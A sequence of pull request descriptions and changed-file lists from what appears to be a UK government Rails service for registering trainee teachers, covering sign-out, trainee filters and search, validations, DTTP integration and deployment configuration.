Adds a sign out link to end session of user, whether they are from DfE Sign In or internal dev use. User will be redirected to home/root page. 
Routes to enable sign out
Sign out controller and methods on dfe sign in model that ends session and redirects depending on user type
Controller test to verify correct behaviour
Fix to previous tests that had outdated routes/slight errors.
Test each env so that you are successfully logged out and are unable to log in without entering credentials again
Toggle use_dfe_sign_in boolean in development.local

[489] Sign out link

---

app/views/trainees/not_supported_route.html.erb
app/views/trainees/show.html.erb
config/settings.yml
config/settings/production.yml
config/settings/qa.yml
config/settings/staging.yml

- https://trello.com/c/OgxGReJa/587-overview-page-return-to-this-draft-later-link
- https://trello.com/c/yzG0cUXb/585-other-route-add-link-to-dttp
- Handle the DTTP link in the not supported view
- Handle the "return to draft later" link in the summary page
- Nothing major, just asserting the links in those views go to where they're supposed to

[585] & [587] - A couple of AO fixes

---

app/controllers/sessions_controller.rb
app/helpers/application_helper.rb
app/views/sign_in/new.html.erb
config/routes.rb
spec/controllers/sessions_controller_spec.rb
spec/helpers/application_helper_spec.rb

A authenticated but unknown user after logging in from DfE Sign-in will be directed to a new page that tells them to
notify us if they wish to log in to Register.
* https://trello.com/c/BY0VkPD0/618-signin-user-doesnt-exist-in-register-journey
New page the user is redirected to after their session is ended
Fix controller test
View helper added from Apply (with changes) 
Make sure allow_user_creation boolean is false or it'll create a user in table
https://rtt-review-pr-239.herokuapp.com/sign-in/user-not-found

[618] Add page for unknown but authenticated user

---

app/components/trainees/outcome_details/view.html.erb
app/controllers/trainees/outcome_dates_controller.rb
app/views/trainees/outcome_dates/confirm.html.erb
config/locales/en.yml
config/routes.rb
spec/features/trainees/recording_training_outcome_spec.rb
spec/support/page_objects/trainees/confirm_outcome_date.rb

https://trello.com/c/2p01YIWQ/645-s-redirect-set-qts-assessment-date-form-to-check-outcome-details-page
This PR redirects the user after they've recorded the outcome date, to a page where they can confirm the outcome details:
- As it stands, the 'Recommend for QTS' button simply redirects back to the trainee edit page. It will eventually:
- Kick off the actual recommendation
- Redirect the user to a 'Trainee recommended for QTS' page
To review:
- Visit https://rtt-review-pr-257.herokuapp.com/ and complete a new trainee
- Head to https://rtt-review-pr-257.herokuapp.com/trainees/:id/edit
- Click the green 'Record training outcome' button and fill in the 'When did they meet the standards?' form
- Check that:
- you're redirected to the confirm page
- the correct outcome date is populated
- …

[645] Check outcome details

---

app/controllers/trn_submissions_controller.rb
app/jobs/dttp/create_job.rb
app/services/dttp/batch_create.rb
db/schema.rb
spec/controllers/trn_submissions_controller_spec.rb
spec/services/dttp/batch_create_spec.rb

https://trello.com/c/xn1BLS8B/638-m-use-a-background-job-to-submit-dttp-batch-request
- New ActiveJob object `Dttp::CreateJob` to run `Dttp::BatchCreate` in the background

[638] Background job to submit DTTP batch request

---

app/controllers/trainees/personal_details_controller.rb
app/models/personal_detail.rb
config/locales/en.yml
spec/models/personal_detail_spec.rb

- https://trello.com/c/rJg1d5ao/590-personal-details-date-of-birth-saving-the-wrong-day-instead-of-throwing-a-validation-error-message
- https://trello.com/c/dR0nkzrM/589-personal-detail-date-of-birth-validations-invalid-day
- Rejigs the `PersonalDetail` so that the date of birth value is validated properly
- Will hydrate/validate model values based on state of Trainee passed in or additional attributes provided
Validates correct date format:
Validates dates are in the past:
- https://rtt-review-pr-266.herokuapp.com/trainees/1/personal-details/edit
- Attempt to save with empty or invalid dob and assert errors are shown

[590] & [589] Fix DOB validations

---

app/components/task_list/view.html.erb
app/components/task_list/view.rb
app/views/trainees/show.html.erb

https://trello.com/c/nE38P3og/588-overview-page-section-links-need-to-be-updated
This PR updates each section link in the trainee overview page so that the following is true:
Status = not started -> links to the beginning of the journey for that section
Status = in progress -> links to the confirmation page
Status = completed -> links to the confirmation page
I thought about letting the `Row` component calculate the path based on a `key` passed in, but I decided that a separate `confirm_path` was probably the least surprising option.

[588] Update overview links

---

app/lib/dttp/batch_request.rb
app/presenters/dttp/trainee_presenter.rb
db/migrate/20201208121221_add_dttp_id_to_users.rb
spec/lib/dttp/batch_request_spec.rb
spec/presenters/dttp/trainee_presenter_spec.rb

https://trello.com/c/LnzRuMik/608-s-mark-the-trainee-as-ready-for-trn
* Add `dfe_trnassessmentdate` to contact params
* Add `dfe_sendforregistration` and `dfe_sendforregistrationdate` to placement_assignemnt params, set to Today's date
Run this script
```ruby
FactoryBot.find_definitions rescue nil
trainee_creator_dttp_id = "98c63edb-b0a6-e811-812c-5065f38bc301"
trainee_attributes = {
age_range: "3 to 11 programme", # "efa15e61-8ec0-e611-80be-00155d010316"
subject: "Art and design", # "ee8274df-181e-e711-80c8-0050568902d3"
}
trainee = FactoryBot.create(:trainee, :with_programme_details, :diversity_disclosed, trainee_attributes)
degree_attributes = {
subject: "Accountancy", # …
```

[608] Mark the trainee as ready for TRN

---

.github/workflows/deploy.yml
.github/workflows/smoke-test.yml

Update Github token to use `GITHUB_TOKEN` 
Update Github token to use `GITHUB_TOKEN`  in github/workflows/deploy.yml and github/workflows/smoke-test.yml

Update github token token in deploy and smoke-test yml files

---

app/components/trainees/record_actions/view.html.erb
app/components/trainees/record_actions/view.rb
app/helpers/application_helper.rb
app/views/trainees/outcome_dates/edit.html.erb
spec/helpers/application_helper_spec.rb

- https://trello.com/c/4w9Fqfo8/669-error-summary-should-be-first-in-page-above-caption
- https://trello.com/c/DpRIb71L/671-need-to-make-sure-all-links-styled-as-buttons-are-using-correct-markup
- Fix the error summary position in the outcome details form
- Fix the markup produced for the Record training outcome button
Error:
Markup:
```html
<a role="button" data-module="govuk-button" draggable="false" class="govuk-button govuk-button govuk-!-margin-bottom-0" href="/trainees/1/outcome-details/outcome-date/edit">Record training outcome</a>
```

[669] & [671] Fix error summary and record outcome button markup

---

app/components/trainees/confirmation/degrees/view.rb
app/views/trainees/check_details/show.html.erb
spec/features/trainees/degrees/adding_degree_spec.rb
spec/features/trainees/edit_personal_details_spec.rb
spec/support/page_objects/trainees/check_details/show.rb
spec/support/page_objects/trainees/confirm_details.rb
spec/support/page_objects/trainees/personal_details.rb

Adding delete functionality to the confirmation page.
- Used the `show_delete_button` to render the delete button on the confirmation page
- Rename the page objects to be more logical and pass the tests 
- Pull down the branch and boot up the server
- Create a trainee and fill in all the details
- Navigate to `/trainees/id/check-details`
- Navigate to `/trainees/id/degrees/confirm`
- Ensure that clicking on the delete button removes the degree.

666 add delete degree option

---

app/components/application_record_card/style.scss
app/components/application_record_card/view.html.erb
app/components/application_record_card/view.rb
app/views/trainees/index.html.erb
config/locales/en.yml
spec/components/application_record_card/view_spec.rb

Records view trainees#index
- Update page title
- Add trainee ID if present
- Add last updated_at or created_at timestamp

[668] Update trainees#index view

---

app/components/page_title/view.rb
app/views/trainees/contact_details/edit.html.erb
app/views/trainees/degrees/edit.html.erb
app/views/trainees/degrees/new.html.erb
app/views/trainees/degrees/type/new.html.erb
app/views/trainees/diversity/disability_details/edit.html.erb
app/views/trainees/diversity/disability_disclosures/edit.html.erb
app/views/trainees/diversity/disclosures/edit.html.erb
app/views/trainees/diversity/ethnic_backgrounds/edit.html.erb
app/views/trainees/diversity/ethnic_groups/edit.html.erb
app/views/trainees/new.html.erb
app/views/trainees/outcome_dates/edit.html.erb
app/views/trainees/personal_details/edit.html.erb
app/views/trainees/programme_details/edit.html.erb
app/views/trainees/show.html.erb
spec/components/page_title/view_spec.rb

- https://trello.com/c/Yp9449HN/672-page-title-on-qts-pages-with-errors-missing-error
- Refactor page title component's handling of error titles
- Update all pages with error messages to display titles correctly
- Head to the review app
- Try to submit any section with invalid data, assert title has error prepended

[672] Page title on qts pages with errors missing "Error: "

---

app/models/outcome_date.rb
config/locales/en.yml
spec/features/trainees/recording_training_outcome_spec.rb

https://trello.com/c/d4eLaHp9/670-errors-on-the-conditional-date-are-showing-on-the-parent-not-the-item-with-the-error
Errors regarding the outcome date field for appear on the date field itself, rather than the radio button group as a whole.
- Visit `/trainees/:id/outcome-details/outcome-date`
- Select 'On another day' and enter either an invalid date or leave it empty
- Check that the error text appears just about the date field, and that the date field itself is styled red.

[670] Fix error stying on outcome date

---

.github/workflows/deploy.yml
.tool-versions
Makefile
terraform/modules/statuscake/main.tf

These were breaking when the bas64 value included newlines in it, which
are valid in base64 payloads.
Quote the necessary variables before passing to `base64 -d`
Testing will be performed on this PR/branch.

add quoting to env vars in deploy workflow

---

app/components/form_components/autocomplete/script.js
app/components/form_components/autocomplete/style.scss

https://trello.com/c/5JlSUwAW/644-s-error-styling-for-autocomplete
This PR fixes two issues:
1. No error styling on an autocomplete in an error state (e.g. empty)
2. When a user entered an invalid search term (i.e. a search term that returns no results) the last valid input was submitted in the form. This meant that no errors would be shown.
Now, the error styling looks like this:
Note: I've applied the fix globally to all autocompletes assuming they have the same issue, but I haven't checked them all.
- Head to `trainees/:id/programme-details` as an example autocomplete
- Fill in the form **correctly** to begin with and click 'Continue'
- Go back to edit the form
- Replace your 'Subject' with a random search term that has no results
- Leave the random string in the autoselect input
- …

[644] Fix error styling on autocompletes

---

app/components/base.scss
app/components/form_components/autocomplete/script.js
app/controllers/trainees/personal_details_controller.rb
app/forms/personal_detail_form.rb
app/helpers/nationalities_helper.rb
app/views/trainees/personal_details/_nationality_select_field.html.erb
app/views/trainees/personal_details/edit.html.erb
app/webpacker/packs/application.js
app/webpacker/scripts/global/nationality_select.js
config/locales/en.yml
spec/features/trainees/edit_personal_details_spec.rb
spec/helpers/nationalities_helper_spec.rb
spec/support/page_objects/trainees/personal_details.rb

https://trello.com/c/GuDw2U0E/591-personal-details-nationalities-no-option-to-record-which-other-nationalities-the-trainee-has
This PR adds the ability for a user to record 'Other nationalities' for a trainee:
- Head to `/trainees/{id}/personal-detail/edit`
With JS:
- Check 'Other' in the nationalities form group
- Click 'Continue'
- Check that there is an error if you attempt to submit with no 'Other' nationality selected
- Choose a nationality from the dropdown
- Click the 'Add another nationality' button
- Choose another nationality
- Click 'Continue'
- Check that the correct nationalities have been saved
- Check that you can 'Change' and edit nationalities (including remove)
With no JS:
- Disable JS in your browser
- Check that there are three working 'Other nationality' select fields

[581] Add option for selecting 'Other nationalities'

---

terraform/workspace-variables/review.tfvars

Review apps are misconfigured and create 10 app instances
Change to 1
Deploy a review app, it should have only 1 instance

Fix instances in review apps config

---

app/components/trainees/confirmation/diversity/view.rb
spec/components/trainees/confirmation/diversity/view_spec.rb

- https://trello.com/c/swCSTg2K/748-freetext-ethnicity-not-shown-in-summary-list
- Fixes the free text ethnic background field not displaying properly if you've selected to provide some other ethnic group/background.

[748] - Free text ethnicity not shown in summary list

---

config/settings/production.yml
config/settings/qa.yml
config/settings/staging.yml

The config we have in QA, staging and prod isn't successfully connecting to DTTP. The auth token does work but the interaction with dynamics does not.
Add scope into each environment settings as it isn't being set from the environment and is different for each dynamics instance.
If this looks ok we can deploy to QA to test and/or merge and fix forward if there are issues as we're not live. The config works locally.

[xxx] Set DTTP scope URLs

---

Makefile
terraform/modules/paas/main.tf
terraform/modules/paas/variables.tf
terraform/modules/statuscake/main.tf
terraform/terraform.tf
terraform/variables.tf
terraform/workspace-variables/app_config.yml
terraform/workspace-variables/pen.tfvars
terraform/workspace-variables/pen_backend.tfvars
terraform/workspace-variables/production.tfvars
terraform/workspace-variables/qa.tfvars
terraform/workspace-variables/staging.tfvars

This commit also introduced a new terraform variable (woker_app_stopped)
This is used in setting if the worker_app should be running or not.
The default is false. For Pentest, this is true
Add pentest environment to Terraform and  Makefile
Add pentest environment to Terraform and  Makefile and introduce work_app_stopped variable

Add pentest environment to Terraform and  Makefile

---

app/views/errors/internal_server_error.html.erb
app/views/errors/not_found.html.erb
app/views/errors/unprocessable_entity.html.erb

Changes:
* Use `govuk-grid-column-two-thirds-from-desktop` by default
* Reduce `h1` size to be more consistent with other pages
* Use correct apostrophies
* Don't use full stops on headings

Clean up error page content

---

Gemfile
Gemfile.lock
lib/tasks/auto_generate_diagram.rake

After upgrading to Rails to 6.1 we got the following error from the rails-erd gem after running `rake db:migrate`:
```ruby
rake aborted!
NoMethodError: undefined method `parent' for RegisterTraineeTeachers::Application:Class
Did you mean?  present?
```
The team has also agreed that it's not needed at the moment and should only be reintroduced if there's a good case for it and it supports the latest version of rails.
https://trello.com/c/rg3lvFxw/773-remove-rails-erd-gem

[773] Remove rails-erd gem

---

app/components/trainees/deferral_details/view.html.erb
app/components/trainees/deferral_details/view.rb
app/components/trainees/record_actions/view.html.erb
app/controllers/trainees/confirm_deferrals_controller.rb
app/controllers/trainees/deferrals_controller.rb
app/forms/deferral_form.rb
app/views/trainees/confirm_deferrals/show.html.erb
app/views/trainees/confirm_withdrawals/show.html.erb
app/views/trainees/deferrals/show.html.erb
app/views/trainees/edit.html.erb
app/views/trainees/outcome_dates/edit.html.erb
config/locales/en.yml
config/routes.rb
db/migrate/20201221173705_add_defer_date_to_trainees.rb
db/schema.rb
spec/components/trainees/confirmation/deferral_details/view_preview.rb
spec/components/trainees/confirmation/deferral_details/view_spec.rb
spec/features/trainees/deferral_trainee_spec.rb
spec/support/page_objects/trainees/confirm_deferral_details.rb
spec/support/page_objects/trainees/edit.rb
spec/support/page_objects/trainees/edit_deferral_date.rb

The ability for providers to defer students who have been registered but not yet completed their programme. Not including DTTP interaction.
- 2 new controllers to handle the deferral details and confirmation journeys
- All the views and components necessary to capture and display information
- Pull down the branch and fire up the server
- Create a trainee and complete all the sections
- Navigate to http://localhost:3000/trainees/{{trainee-id?}}/edit
- Click the defer button
- Have a play around, check that all the buttons work as expected 
- Check the correct validation error messages are displayed if an error is made
- Check that it matches the prototype

[581] Defer students

---

app/webpacker/scripts/global/nationality_select.js

https://trello.com/c/W6wJfWMc/752-nationality-autocomplete-cleanup
This PR:
- Focuses the newly added autocomplete input when you press the 'Add another nationality' button
- Focuses the prior autocomplete when you press 'Remove'
- Prevents the page from jumping to the top when you press 'Remove'
- Makes hidden text on 'Remove' link lowercase
- Head to `/trainees/:id/personal-details/edit`
- Check the above four things!

[752] Fix nationality autocomplete bugs

---

app/components/base.scss
app/components/trainees/filters/script.js
app/components/trainees/filters/style.scss
app/components/trainees/filters/view.html.erb
app/components/trainees/filters/view.rb
app/controllers/trainees_controller.rb
app/helpers/application_helper.rb
app/helpers/programme_details_helper.rb
app/models/trainee.rb
app/services/trainees/filter.rb
app/views/trainees/index.html.erb
app/webpacker/styles/application.scss
config/locales/en.yml
config/webpacker.yml
package.json
spec/components/trainees/filters/view_preview.rb
spec/components/trainees/filters/view_spec.rb
spec/features/trainees/filtering_trainees_spec.rb
spec/models/trainee_spec.rb
spec/support/page_objects/trainees/index.rb
yarn.lock

https://trello.com/c/bqW6rtSv/694-l-search-trainee-records-using-filters
https://trello.com/c/t8bqngK8/765-s-add-trainee-status-filter
This PR allows users to filter on trainees by:
1. Route (assessment only vs provider led)
2. Status
3. Subject
- Head to the index page `/trainees`
- Check that all trainees are shown when no filters are applied
- Test out the filters one by one, checking that:
- the correct trainees are shown, and
- the correct tags are shown
- Test clearing all filters works
- Test that removing individual tags works

[694] Filtering trainees by route and subject

---

app/components/trainees/record_actions/view.html.erb

As we're not doing work around outcomes just yet, change the button text to more closely match the action users are doing.

Change button text to match action

---

app/components/trainees/record_actions/view.html.erb
app/components/trainees/record_actions/view.rb
app/controllers/trainees/deferrals_controller.rb
app/controllers/trainees/withdrawals_controller.rb
app/policies/trainee_policy.rb
config/initializers/omniauth.rb
spec/components/trainees/record_actions/view_preview.rb
spec/components/trainees/record_actions/view_spec.rb
spec/factories/trainees.rb
spec/features/trainees/defer_trainee_spec.rb
spec/features/trainees/withdraw_trainee_spec.rb
spec/models/trainee_spec.rb

https://trello.com/c/XI93jaHF/779-clean-up-withdraw-trainee
https://trello.com/c/qaNHqDxl/778-clean-up-defer-trainee
- Add logic to the view component to show/hide links based on trainee state
- Add policy methods to authorise deferrals and withdrawals
- Fix deprecated warnings
Since it's not possible to put trainees into various states easily the next best thing is to fire up the server locally and visit `/view_components/trainees/record_actions/view` to see the component in various states.

[778] Clean up defer/withdraw trainee

---

app/components/summary_card/view.rb
app/components/trainees/confirmation/contact_details/view.html.erb
app/components/trainees/confirmation/degrees/view.html.erb
app/components/trainees/confirmation/diversity/view.html.erb
app/components/trainees/confirmation/personal_details/view.html.erb
app/components/trainees/confirmation/programme_details/view.html.erb
app/components/trainees/confirmation/record/view.html.erb
app/components/trainees/confirmation/trainee_id/view.html.erb
app/components/trainees/confirmation/withdrawal_details/view.html.erb
app/components/trainees/deferral_details/view.html.erb
app/components/trainees/outcome_details/view.html.erb
app/components/trainees/record_details/view.html.erb
lib/tasks/example_data.rake
spec/components/summary_card/view_spec.rb

https://trello.com/c/ailqjhyA/782-prevent-editing-of-withdrawn-trainees
Modify `app/components/summary_card/view.html.erb` to hide change links when the trainee is in the following states:
-  Recommended for QTS
- Award for QTS
- Withdrawn
- Make sure you have example data loaded: `rake example_data:generate`
- Fire up the server locally and visit `/trainees`
- Choose a trainee with the following states: Recommended for QTS, Award for QTS, Withdrawn and confirm that the change links are not displayed
- For all other states, the change links should appear

[782] Prevent editing base on trainee state

---

Gemfile
Gemfile.lock
app/components/trainees/filters/view.html.erb
app/components/trainees/filters/view.rb
app/controllers/trainees_controller.rb
app/models/trainee.rb
app/services/trainees/filter.rb
spec/features/trainees/filtering_trainees_spec.rb
spec/models/trainee_spec.rb
spec/support/page_objects/trainees/index.rb

https://trello.com/c/HzoTQU3L/695-m-search-trainee-records-by-keyword
This PR:
- Adds the gem [pg_search](https://github.com/Casecommons/pg_search)
- Configures the search to use a prefix tsearch on the following columns: `first_names`, `middle_names`, `last_name`, `trn` and `trainee_id`
This PR does not include and performance testing on the search / any optimisation using stored `tsvector` columns. the `tsvector` is created on the fly by pg_search.
To review:
- Head to `/trainees`
- Search trainees by entering a variety of search terms
- Check that the expected trainees are returned

[695] Keyword search for trainees

---

app/forms/programme_detail_form.rb
config/locales/en.yml
spec/components/application_record_card/view_spec.rb
spec/factories/trainees.rb
spec/forms/programme_detail_form_spec.rb
spec/services/programme_details/update_spec.rb

Validation for programme dates
Validation for start date to be within 10 years
Validation for end date to be after start date

[769] Added more validation to programme dates

---

app/components/application_record_card/view.html.erb
app/components/application_record_card/view.rb
app/helpers/trainee_helper.rb
app/views/trainees/confirm_details/show.html.erb
app/views/trainees/contact_details/edit.html.erb
app/views/trainees/diversity/confirm_details/show.html.erb
app/views/trainees/diversity/disclosures/edit.html.erb
app/views/trainees/personal_details/edit.html.erb
app/views/trainees/programme_details/edit.html.erb
app/views/trainees/training_details/edit.html.erb
spec/helpers/trainee_helper_spec.rb

https://trello.com/c/zQ2Yeg6s/776-refine-ui-based-on-trainee-status
This PR creates a view helper which decides which trainee page to link you to depending on the trainee's state.
If we decide later down the line to change the route `/edit` to something else (as has been discussed) then this means we only have to change it in one place 👍 
This is a little tricky to test in a deployed environment, since we're not yet moving trainees through states. So I suggest:
- Pull down code locally
- Test links for a draft trainee link to the trainee show page
- Manipulate a trainee to be in a state other than draft
- Test that links send you to the trainee edit page
- When you click on a trainee from the trainee index page
- When you're editing sections and click 'Back'
- When you're confirming …

[776] Add conditional links to trainee pages

---

app/controllers/trainees_controller.rb
app/models/trainee.rb
app/views/trainees/index.html.erb
spec/features/trainees/viewing_an_existing_trainee_spec.rb
spec/models/trainee_spec.rb
spec/support/page_objects/trainees/index.rb

- Improve UI of records i.e. draft vs complete and ordering
- Spilt trainee records by draft and non-draft
- Order trainees by updated at first

[792] Split and order trainees by date

---

app/components/application_record_card/view.html.erb
app/components/application_record_card/view.rb
app/components/status_tag/view.html.erb
app/components/status_tag/view.rb
app/views/layouts/trainee_record.html.erb
config/locales/en.yml
spec/features/trainees/edit_trainee_record_spec.rb
spec/support/page_objects/trainees/edit.rb

https://trello.com/c/2Qd2u1LS/777-use-correct-status-in-heading-of-traineesedit
This PR:
- Changes the page title to be the trainee's name as per the prototype
- Makes the state tag dynamic, reusing some code from the index page
On the trainee edit page:
- Check that the trainee's name is the page title.
- Check that the correct status is shown in the heading tag.

[777] Update edit trainee page heading and title

---

app/components/trainees/filters/view.html.erb
app/components/trainees/filters/view.rb
config/locales/en.yml

* https://trello.com/c/KjRNQRY5/787-filters-ensure-that-filter-tag-labels-are-consistent-with-prototype
State was being rendered instead of Status, as per the params. State => 'draft' etc
Keys in params translated so state is now translated to status. 
Record type filter label changed to Training Route reflecting change in prototype
Any new view changes with filter labels now easily changeable 
Start up app with personas on. Apply filters on /trainees page to see if bug fixed.

[787] Fix filter label bug

---

app/components/trainees/filters/script.js
app/components/trainees/filters/view.html.erb
config/webpack/environment.js
package.json
yarn.lock

https://trello.com/c/EtC2pNGc/790-filters-hide-show-filters-button-on-mobile
This PR implements the MOJ `FilterToggleButton` JavaScript which:
- Hides the filters and shows a 'Show filter' button on small screens
- Toggles the filters when this button is pressed
- Adds a 'Close' button on the filter sidebar when open
With no JS, the filters are visible all the time, above the list of trainees.
Note: We can't use the MOJ code without JQuery.
- Head to `/trainees`
- Check that the filters are hidden when the screen is smaller
- Click 'Show filter' to open the filters
- Click 'Close' to close the filters
- Disable JS and check that the filters are always visible

[790] Hide/show filters on mobile

---

app/forms/deferral_form.rb
app/forms/outcome_date_form.rb
app/forms/withdrawal_form.rb
app/views/trainees/withdrawals/show.html.erb
config/locales/en.yml
spec/features/trainees/defer_trainee_spec.rb
spec/features/trainees/recording_training_outcome_spec.rb
spec/features/trainees/withdraw_trainee_spec.rb

https://trello.com/c/Fx0JvkQv/774-fix-error-styling-on-date-error-messages-within-outcome-deferral-and-withdrawal
- Add another error type to cover the case where the user doesn't choose any date
Fire up the local server
- Select a trainee in draft state and and visit their edit page manually
- Click "Recommend for QTS"
- Submit form without choosing any of the options
- It should display error message "You must choose an outcome date"
- Choise a trainee in pending TRN state
- Click "Defer"
- Submit form without choosing any of the options
- It should display error message "You must choose an deferral date"
- Choise a trainee in pending TRN state
- Click "Withdraw"
- Submit form without choosing any of the options
- It should display error message "You must choose an withdrawal date"

[774] Fix error styling on date error messages within Outcome, Deferral and Withdrawal

---

app/components/trainees/record_details/view.html.erb
app/components/trainees/record_details/view.rb

TRN on record details
Show TRN is present else show TRN submitted date
- Navigate to `/trainees`
- Click on a trainee where the status is "TRN pending"
- TRN should be present
- 
- Navigate to `/trainees`
- Click on a trainee where the status is "TRN received"
- TRN should be present

[783] Show trn on record details if present

---

app/forms/contact_detail_form.rb
app/validators/email_format_validator.rb
config/locales/en.yml
spec/features/trainees/filtering_trainees_spec.rb
spec/forms/contact_detail_form_spec.rb
spec/validators/email_format_validator_spec.rb
spec/validators/postcode_validator_spec.rb

https://trello.com/c/yjuxEF68/733-contact-details-add-better-email-validation
This PR adds custom email validation using the same rules as set out in `validate_email_address` here:
https://github.com/alphagov/notifications-utils/blob/fd3ba3db8cfaf4ad5308aaf5efdcd4e0cf3730e8/notifications_utils/recipients.py#L483-523
and using the regexes defined here:
https://github.com/alphagov/notifications-utils/blob/494484aa44edeac7b103cfad1ac795cf0271b525/notifications_utils/__init__.py 
The rules should be relatively self-explanatory by reading the method names in the custom validator class.
Not included (yet?):
- the removal of obscure whitespace characters (e.g. zero width space, non breaking space)
- converting unicode into its accurate ascii and checking for unicode errors
**Bonus**
This PR also …

[733] Custom email validation

---

.github/workflows/build.yml
.github/workflows/deploy.yml
Makefile
docker-compose.yml

Changed docker image name from `dfedigital/register-trainee-teacher-data` to `dfedigital/register-trainee-teachers`. This is a strategic shift in order to align with other changes elsewhere
Changed docker image name inline with other changes elsewhere i.e. from `dfedigital/register-trainee-teacher-data` to `dfedigital/register-trainee-teachers`.

Change docker image name

---

app/components/trainees/filters/view.html.erb
app/components/trainees/filters/view.rb
app/controllers/trainees_controller.rb
app/models/trainee_filter.rb
app/services/trainees/filter.rb
app/views/trainees/index.html.erb
config/locales/en.yml
spec/components/trainees/filters/view_spec.rb
spec/models/trainee_filter_spec.rb

https://trello.com/c/ObQKrk7D/791-filters-handle-bad-manual-query-string-inputs
This PR introduces a new `TraineeFilter` model that is responsible for 'cleaning up' the parameters before passing to the view component to render. The view now receives a hash of cleaned up, active filters.
This means that:
1. the view is no longer responsible for deciding whether a filter is active or not 👍
2. the check for "All subjects" is now applied in one place only (the new `TraineeFilter` model) and not in two places (the view component and the filter service) 👍 
The `TraineeFilter` model applies different logic to each filter param based on the filter itself. For enum checkboxes, it removes options that aren't defined (i.e. if someone tampers with the query string directly and inputs bad params).
- …

[792] Clean up applied filters before rending

---

app/components/trainees/record_header/view.html.erb
app/components/trainees/record_header/view.rb
app/views/layouts/trainee_record.html.erb
spec/components/trainees/record_details/view_spec.rb
spec/components/trainees/record_header/view_preview.rb
spec/components/trainees/record_header/view_spec.rb

If a trainee has been assigned a trn number it is now visible on the trainees edit page.
- Added a view component
- Added the trn number and status tag to the component  
- Added record header to trainee layout
- Fixed spec description to make tests more consistent
- Boot up the server and navigate to `trainees/?/edit`
- Check the trn number is visible if the trainee has been assigned one (e.g a QTS awarded record)
- Check the trn number is not visible if the trainee has not been assigned one (e.g a draft record)

[784] Show trn number in heading on trainees edit

---

app/components/trainees/confirmation/personal_details/view.rb
app/models/trainee.rb
app/views/trainees/personal_details/edit.html.erb
config/locales/en.yml
spec/components/trainees/confirmation/personal_details/view_spec.rb
spec/models/trainee_spec.rb

- https://trello.com/c/gtPNgmnY/761-s-add-not-provided-to-gender-option-in-personal-details
- Implement the not provided option when selecting the gender
- Sending this new option to DTTP will be handled in a separate ticket
- Head to the personal details section
- Assert you can select the not provided option and see it in the confirmation

[761] Implement not provided for gender option

---

app/views/trainees/show.html.erb

Clean up trainee show page
- add trainee name above H1
- re-order summary lists
- update some content

[818] Reorder trainee summary list data

---

app/components/flash_banner/view.html.erb
app/components/flash_banner/view.rb
app/components/notification_banner/view.html.erb
app/components/notification_banner/view.rb
app/controllers/trainees/confirm_deferrals_controller.rb
app/controllers/trainees/confirm_details_controller.rb
app/controllers/trainees/confirm_withdrawals_controller.rb
app/controllers/trainees/degrees_controller.rb
app/views/layouts/application.html.erb
config/locales/en.yml
spec/components/flash_banner/view_preview.rb
spec/components/flash_banner/view_spec.rb
spec/components/notification_banner/view_spec.rb
spec/features/trainees/degrees/adding_degree_spec.rb
spec/features/trainees/diversities/edit_disabilities_spec.rb
spec/features/trainees/diversities/edit_disability_disclosure_spec.rb
spec/features/trainees/diversities/edit_disclosure_spec.rb
spec/features/trainees/edit_contact_details_spec.rb
spec/features/trainees/edit_personal_details_spec.rb
spec/features/trainees/edit_programme_details_spec.rb
spec/features/trainees/edit_trainee_record_spec.rb

https://trello.com/c/U8u99a02/800-m-add-flash-messages-to-service?menu=filter&filter=label:Dev
This PR adds a flash message component and renders a flash message in certain controllers as per the list on the Trello card.
The confirm pages using the generic confirm controller should all have sensible flash messages, which are specific to what the user is confirming.
Two situations on the card list - reinstating a trainee and deleting a draft - have not been implemented yet.
- Go down the list of scenarios as stated in the Trello card and test that the correct flash message appears in the correct location on the next page.
I thought it was worth adding support for 'warning' and 'info' flash messages as this is quite standard, however I haven't (yet?) added any. Currently we're not handling …

[800] Implement flash messages

---

app/components/trainees/record_actions/view.html.erb
app/components/trainees/record_actions/view.rb
config/locales/en.yml
spec/components/trainees/record_actions/view_spec.rb

https://trello.com/c/viF2PKvL/785-actions-with-defer-and-withdraw-should-be-sentence-case
* 'Withdraw' is now lowercase 
* 'Reinstate' made a placeholder to avoid a lowercase 'withdraw' by itself. Links to /trainees until reinstate functionality is implemented
* Refactor to avoid too many conditionals/guard statements in view
* Fix tests and a typo
Select trainees that have different states to see how component is rendered
For trn received
For deferred

[785] Add placeholder and change to sentence case

---

app/components/trainees/timeline/script.js
app/components/trainees/timeline/style.scss
app/components/trainees/timeline/view.html.erb
app/components/trainees/timeline/view.rb
app/controllers/trainees/timelines_controller.rb
app/views/layouts/trainee_record.html.erb
app/views/trainees/timelines/show.html.erb
config/initializers/date_formats.rb
config/routes.rb
spec/components/trainees/filters/view_preview.rb
spec/components/trainees/timeline/view_preview.rb
spec/components/trainees/timeline/view_spec.rb
spec/config/initializers/date_formats_spec.rb
spec/features/trainees/viewing_the_timeline_spec.rb
spec/support/page_objects/trainees/edit.rb
spec/support/page_objects/trainees/timeline.rb

https://trello.com/c/XvvrSVGO/619-build-mvp-of-the-timeline
The PR:
- Creates a `Trainee::Timeline` view component, which is responsible for transforming events on the trainee into the correct format for the timeline, and rendering them.
- Links to the new timeline page from a tab on the trainee edit page.
- As per the notes in the code:
- Once we implement auditing, the events in the `Trainee::Timeline` component will come from audit events. For now I've picked out `created_at` and `submitted_for_trn` for something to render.
- Currently we don't know which user made changes, - this will be pulled from the audit event. For now I've just assumed it was the first user for the provider, as a placeholder.

[619] MVP trainee timeline

---

app/models/degree.rb
config/locales/en.yml
spec/factories/degrees.rb
spec/models/degree_spec.rb

https://trello.com/c/fO03oOUh/798-s-improve-graduation-validation
* Validations to stop a graduation year more than 1 year in future and more than 60 years in past. More precise validation messages. 
* Model tests on Degree
Need for another validation, say to specify that they need to enter numbers? Though if they do it will be caught anyway.

[798] Improve graduation validation

---

app/views/trainees/confirm_details/show.html.erb
app/views/trainees/diversity/confirm_details/show.html.erb

Backlink should be different for draft and non-draft records
Check the status of the record/trainee then show different content in the back link

[822] Update backlink text for draft records

---

app/controllers/trainees/confirm_details_controller.rb
app/views/trainees/confirm_details/_form.html.erb
spec/features/trainees/edit_personal_details_spec.rb

https://trello.com/c/zHxUX9ZE/825-confirm-checkbox-should-not-be-visible-on-confirmation-screen-for-non-draft-records
This PR hides the checkbox for completing a section from the confirmation pages for non-draft trainees.
It also (for now) just wraps the controller code that needs this param in an `if ... else` statement. I'm not sure whether I'm happy with using the same controller for draft and non-draft trainees if they're doing different things, but I'd rather wait until we address the issue of persisting unsaved data through to the confirm stage as these controllers may have to change!
- With a draft trainee, check that the confirm pages still have the checkbox
